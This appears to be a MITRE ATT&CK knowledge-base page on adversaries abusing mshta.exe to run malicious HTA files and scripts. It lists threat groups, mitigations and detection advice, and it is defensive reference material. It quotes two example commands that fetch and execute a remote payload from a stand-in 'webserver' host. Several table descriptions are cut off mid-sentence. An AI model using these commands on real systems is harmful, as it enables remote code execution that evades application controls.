Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code [1] [2] [3] [4] [5]
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. [6] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [7]
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. [8]
ID | Name | Description |
---|---|---|
G0016 | APT29 |
APT29 has use |
G0050 | APT32 | |
S0414 | BabyShark |
BabyShark has used mshta.exe to download and execute applications from a remote server.[12] |
G0142 | Confucius |
Confucius has used mshta.exe to execute malicious VBScript.[13] |
G0046 | FIN7 |
FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.[5] |
G0047 | Gamaredon Group |
Gamaredon Group has used |
G0100 | Inception |
Inception has used malicious HTA files to drop and execute malware.[15] |
G0094 | Kimsuky |
Kimsuky has used mshta.exe to run malicious scripts on the system.[16][12][17][18] |
S0250 | Koadic |
Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.[19][20] |
G0032 | Lazarus Group |
Lazarus Group has used |
G0140 | LazyScripter |
LazyScripter has used |
S0455 | Metamorfo | |
G0069 | MuddyWater |
MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[24][25] |
G0129 | Mustang Panda |
Mustang Panda has used mshta.exe to launch collection scripts.[26] |
S0228 | NanHaiShu | |
S0223 | POWERSTATS |
POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.[24] |
S0147 | Pteranodon |
Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.[14] |
S0379 | Revenge RAT |
Revenge RAT uses mshta.exe to run malicious scripts on the system.[28] |
S0589 | Sibot | |
G0121 | Sidewinder |
Sidewinder has used |
G0127 | TA551 | |
S0341 | Xbash |
ID | Mitigation | Description |
---|---|---|
M1042 | Disable or Remove Feature or Program |
Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. |
M1038 | Execution Prevention |
Use application control configured to block execution of |
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0022 | File | File Creation |
DS0029 | Network Traffic | Network Connection Creation |
DS0009 | Process | Process Creation |
Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious